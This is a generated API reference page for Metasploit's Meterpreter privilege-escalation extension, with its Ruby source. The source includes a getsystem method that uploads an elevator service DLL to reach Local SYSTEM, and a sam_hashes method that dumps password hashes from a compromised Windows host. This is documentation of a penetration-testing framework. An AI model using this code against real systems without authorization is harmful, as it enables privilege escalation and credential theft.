Class: Rex::Post::Meterpreter::Extensions::Priv::Priv
- Inherits:
-
Rex::Post::Meterpreter::Extension
- Object
- Rex::Post::Meterpreter::Extension
- Rex::Post::Meterpreter::Extensions::Priv::Priv
- Defined in:
- lib/rex/post/meterpreter/extensions/priv/priv.rb
Overview
This meterpreter extensions a privilege escalation interface that is capable of doing things like dumping password hashes and performing local exploitation.
Instance Attribute Summary collapse
-
#fs ⇒ Object
readonly
Modifying privileged file system attributes.
Attributes inherited from Rex::Post::Meterpreter::Extension
Instance Method Summary collapse
-
#getsystem(technique = 0) ⇒ Object
Attempt to elevate the meterpreter to Local SYSTEM.
-
#initialize(client) ⇒ Priv
constructor
Initializes the privilege escalationextension.
-
#sam_hashes ⇒ Object
Returns an array of SAM hashes from the remote machine.
Constructor Details
#initialize(client) ⇒ Priv
Initializes the privilege escalationextension.
25 26 27 28 29 30 31 32 33 34 35 36 37 38 |
# File 'lib/rex/post/meterpreter/extensions/priv/priv.rb', line 25 def initialize(client) super(client, 'priv') client.register_extension_aliases( [ { 'name' => 'priv', 'ext' => self }, ]) # Initialize sub-classes self.fs = Fs.new(client) end |
Instance Attribute Details
#fs ⇒ Object
Modifying privileged file system attributes.
100 101 102 |
# File 'lib/rex/post/meterpreter/extensions/priv/priv.rb', line 100 def fs @fs end |
Instance Method Details
#getsystem(technique = 0) ⇒ Object
Attempt to elevate the meterpreter to Local SYSTEM
43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 |
# File 'lib/rex/post/meterpreter/extensions/priv/priv.rb', line 43 def getsystem( technique=0 ) request = Packet.create_request( 'priv_elevate_getsystem' ) elevator_name = Rex::Text.rand_text_alpha_lower( 6 ) elevator_path = MeterpreterBinaries.path('elevator', client.binary_suffix) elevator_path = ::File.( elevator_path ) elevator_data = "" ::File.open( elevator_path, "rb" ) { |f| elevator_data += f.read( f.stat.size ) } request.add_tlv( TLV_TYPE_ELEVATE_TECHNIQUE, technique ) request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_NAME, elevator_name ) request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_DLL, elevator_data ) request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_LENGTH, elevator_data.length ) # as some service routines can be slow we bump up the timeout to 90 seconds response = client.send_request( request, 90 ) technique = response.get_tlv_value( TLV_TYPE_ELEVATE_TECHNIQUE ) if( response.result == 0 and technique != nil ) client.core.use( "stdapi" ) if not client.ext.aliases.include?( "stdapi" ) client.sys.config.getprivs if client.framework.db and client.framework.db.active client.framework.db.report_note( :host => client.sock.peerhost, :workspace => client.framework.db.workspace, :type => "meterpreter.getsystem", :data => {:technique => technique} ) rescue nil end return [ true, technique ] end return [ false, 0 ] end |
#sam_hashes ⇒ Object
Returns an array of SAM hashes from the remote machine.
88 89 90 91 92 93 94 95 |
# File 'lib/rex/post/meterpreter/extensions/priv/priv.rb', line 88 def sam_hashes # This can take a long long time for large domain controls, bump the timeout to one hour response = client.send_request(Packet.create_request('priv_passwd_get_sam_hashes'), 3600) response.get_tlv_value(TLV_TYPE_SAM_HASHES).split(/\n/).map { |hash| SamUser.new(hash) } end |